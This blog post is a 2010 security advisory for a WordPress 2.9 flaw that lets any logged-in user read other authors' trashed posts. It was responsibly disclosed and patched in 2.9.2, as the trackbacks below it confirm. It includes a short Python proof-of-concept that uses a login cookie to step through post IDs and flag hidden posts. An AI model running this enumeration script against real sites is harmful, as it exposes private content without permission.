WordPress >= 2.9 Failure to Restrict URL Access

by tmac on Feb.13, 2010, under Hacks, Personal, Projects

Following on from the research I have been conducted, I have now released the following advisory and it has been forwarded onto the correct people at WordPress

http://www.thomasmackenzie.co.uk/

1. *Advisory Information*

Title: WordPress >= 2.9 Failure to Restrict URL Access
Date published: 13/02/2010

2. *Vulnerability Information*

Class: Failure to Restrict URL Access
Remotely Exploitable: Yes
Locally Exploitable: Yes

3. *Software Description*

WordPress is a state-of-the-art publishing platform with a
focus on aesthetics, web standards, and usability. WordPress
is both free and priceless at the same time. [0]

4. *Vulnerability Description*

Frequently, the only protection for a URL is that links to that page
are not presented to unauthorized users. Security by obscurity is
not sufficient to protect sensitive functions and data in an application.
Access control checks must be performed before a request to a sensitive
function is granted, which ensures that the user is authorized to access
that function. [1]

5. *Vulnerable packages*

Versions >= 2.9

6. *Non-vulnerable packages*

Versions < 2.9

7. *Vulnerability Overview*

Since version 2.9 a new feature was implemented so that users
were able to retrieve posts that they may have deleted by accident.
This new feature was labeled ‘trash’. Any posts that are placed within
the trash are only viewable by authenticated priveleged users.

8. *Technical Description*

When WordPress implemented the new feature they failed to change the
permissions granted when the post is in the trash. This means that
an unauthenticated user cannot see the post, however an authenticated
user can no matter what priviledges they have, even ’subscriber’.

“Subscriber [User Level 0] – Somebody who can read comments/comment/receive news letters, etc.” [2]

9. *PoC*


#/usr/bin/python
#
# WordPress > 2.9 Failure to Restrict URL Access PoC
#
# This script iterates through the WP post ID's as an authenticated and unauthenticated user.
# If the requests differ a 'Trash' post has been found.
#
# You will need an authenticated user cookie of any priveledge to run this script.
#
# Example cookie:
# wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8
#
# Will only work with WP URLs with the '/?p={int}' parameter. Would need to handle redirects (3xx) to handle all URL types.
#
#
# Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)

import httplib

# Declare vars
blogURL = "www.example.com"
userCookie = "enter_cookie_here"
postID = 0 #Leave at 0

conn = httplib.HTTPConnection(blogURL)
Headers = {"Cookie" : userCookie}

print
print "Target = http://" + blogURL + "/?p=" + str(postID)
print

while 1:

 # Start non authenticated enumeration

 request = '/?p=' + str(postID)
 conn.request("GET", request, "")

 try:
  r1 = conn.getresponse()
 except:
  print "Connection error"

 data1 = r1.read()

 # Start authenticated enumeration

 conn.request("GET", request, None, Headers)

 try:
  r2 = conn.getresponse()
 except:
  print "Connection error"

 data2 = r2.read()

 # Compare the HTML body reponses

 if data1 != data2:
  print "+ Found! http://" + blogURL + request
 else:
  print request

 postID += 1

conn.close()

10. *Credits*

Thomas Mackenzie (tmacuk) – http://www.thomasmackenzie.co.uk/
Original finder and tester.

Ryan Dewhurst (ethicalhack3r) – http://www.ryandewhurst.co.uk/
PoC creation and analysis.

Arron Finnon (f1nux) – http://www.finux.co.co.uk/
Helped with documentation.

Matthew Hughes – http://www.matthewhughes.co.uk/
Helped with documentation.

Robin Wood (digininja) – http://www.digininja.org/
Helped identify the vulnerability type.

11. *References*

[0] http://wordpress.org/
[1] http://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access
[2] http://codex.wordpress.org/Roles_and_Capabilities

2 Comments for this entry

lcw
February 20th, 2010 on 9:59 am
Very Good!
john
March 21st, 2010 on 4:49 pm
This fixes a problem that allows users that are logged in to view trash posts authored by other users. Thomas Mackenzie alerted us to a problem where logged in users can peek

26 Trackbacks / Pingbacks for this entry

uberVU - social comments
February 13th, 2010 on 7:18 pm
Social comments and analytics for this post…

This post was mentioned on Twitter by tmacuk: WordPress >= 2.9 Failure to Restrict URL Access found – http://tmacuk.co.uk/?p=180...
WordPress >= 2.9 Failure to Restrict URL Access « tmacuk | Wordpress Marketing
February 13th, 2010 on 8:23 pm
[...] Read the original: WordPress >= 2.9 Failure to Restrict URL Access « tmacuk [...]
Most Tweeted Articles by Defcon Experts
February 15th, 2010 on 10:16 am
[...] new bug found in wordpress 2.9.1 [...]
WordPress 2.9.2 Released – Security Fix
February 15th, 2010 on 5:51 pm
[...] 2.9.2 was released just a few minutes ago to address a security problem dealing with the Trash feature. When WordPress implemented the new feature they failed to change [...]
Wordpress 2.9.2 Released | Netchunks
February 15th, 2010 on 7:08 pm
[...] WordPress 2.9.2 was released just a hour ago to address a securitybug realted to the trash feature. A Wordpress user alerted Wordpress about a problem where logged in [...]
Vulnerabilidad en Wordpress 2.9 | ooo la la la la : ) HACKED ! by ! mOmiX ! Sory Security Team :(((
February 15th, 2010 on 8:01 pm
[...] Mackenzie ha encontrado un bug del tipo Failure to Restrict URL Access en Wordpress 2.9 y superiores (no así las versiones inferiores) y ha publicado una PoC al [...]
WordPress 2.9.2 « hep-cat.de
February 15th, 2010 on 8:42 pm
[...] under: Unauthorized — atari @ 9:42 pm WordPress 2.9.2 is available! Please update now. Thomas Mackenzie alerted us to a problem where logged in users can peek at trashed posts belonging to other authors. If you have untrusted [...]
WordPress Trashed Posts Security Bypass Vulnerability « Bug-Blog
February 16th, 2010 on 12:01 am
[...] ORIGINAL ADVISORY: http://tmacuk.co.uk/?p=180 [...]
WordPress >= 2.9 Failure to Restrict URL Access « tmacuk Mobile
February 16th, 2010 on 1:39 am
[...] WordPress >= 2.9 Failure to Restrict URL Access « tmacuk[...]
WordPress 2.9.2??,???????? - Anear's Space
February 16th, 2010 on 3:37 am
[...] ?BUG??????WordPress >= 2.9 Failure to Restrict URL Access [...]
T. Longren
February 16th, 2010 on 4:11 am
WordPress 2.9.2…

WordPress 2.9.2 was released earlier today. You can download it here. This fixes a problem that allows users that are logged in to view trash posts authored by other users. Thomas Mackenzie alerted us to a problem where logged in users can peek at tras…
WordPress 2.9.2?? | ?????
February 16th, 2010 on 6:07 am
[...] ?BUG??????WordPress >= 2.9 Failure to Restrict URL Access [...]
Pueden leer tu “Basura”
February 16th, 2010 on 6:57 am
[...] nuevo fallo en el famoso WordPress, descubierto por el investigador Thomas Mackenzie permitiría a “cualquier” persona los artículos, comentarios y paginas, que hayas [...]
URL Not Found
February 16th, 2010 on 9:25 am
[...] [...]
The short memory of WordPress.org security « hakre on wordpress
February 16th, 2010 on 10:18 am
[...] WordPress >= 2.9 Failure to Restrict URL Access (Feb. 13, 2010; by Thomas Mackenzie) – report by Thomas MacKenzie [...]
WordPress 2.9.2 Fixes a Security Vulnerability — Javamancy
February 16th, 2010 on 1:21 pm
[...] posts that belong to others, so sensitive or private information may be inappropriately accessible. Thomas Mackenzie first mentioned this on his blog a few days ago (with a lot of interesting details), and even posted a diff patch for [...]
WordPress Security is a Joke (2.9.2 Released) | WPblogger
February 16th, 2010 on 10:23 pm
[...] can read all the details over on Thomas Mackenzie’s blog but basically if you have any sensitive data in a post that you trashed or perhaps said something [...]
Actualización de seguridad 2.9.2 en Wordpress | Yo Binario
February 17th, 2010 on 10:45 am
[...] nueva release de seguridad se debe a un bug que afecta a la rama 2.9.X documentado por Thomas Mackenzie en su blog, es importante actualizar a la nueva versión 2.9.2 sobretodo si hay usuarios [...]
Script para leer papelera en Wordpress :Luctus
February 17th, 2010 on 6:03 pm
[...] nuevo fallo en el famoso WordPress, descubierto por el investigador Thomas Mackenzie permitiría a “cualquier” persona los artículos, comentarios y paginas, que hayas borrado y se [...]
WordPress 2.9.2 aneb tak trochu „zbyte?ná“ bezpe?nostní aktualizace | Separatista
February 17th, 2010 on 10:07 pm
[...] bezpe?nostní riziko), dokud se toho nechopil Thomas Mackenzie, který celý problém podrobn? zdokumentoval a odeslal ho na speciální emailovou adresu security@wordpress.org, která je ur?ena práv? pro [...]
2010??????WordPress 2.9.2?? - ?????Easy to do anything
February 19th, 2010 on 6:46 am
[...] ?BUG??????WordPress >= 2.9 Failure to Restrict URL Access [...]
?B?SEO » WordPress 2.9.2???????
February 21st, 2010 on 12:27 am
[...] ?BUG??????WordPress >= 2.9 Failure to Restrict URL Access [...]
WordPress Thrashing Authorisation Bypass
February 22nd, 2010 on 9:41 pm
[...] Thomas Mackenzie has reported a vulnerability affecting Wordpress >= 2.9. Versions before 2.9 are not vulnerable. [...]
host barato
February 28th, 2010 on 12:06 am
host barato…

Este sitio tiene buenas recomendaciones de hostings economicos…
fix credit
March 17th, 2010 on 5:20 pm
fix credit…

I have been looking through these webpages and thought this site was interesting!…
Source N Code » Blog Archive » What is WordPress?
April 25th, 2010 on 11:58 am
[...] On February 13th 2010 Thomas Mackenzie released an advisory regarding a vulnerability of failing to restrict URL access. The advisory can be found at Thomas’s Blog [...]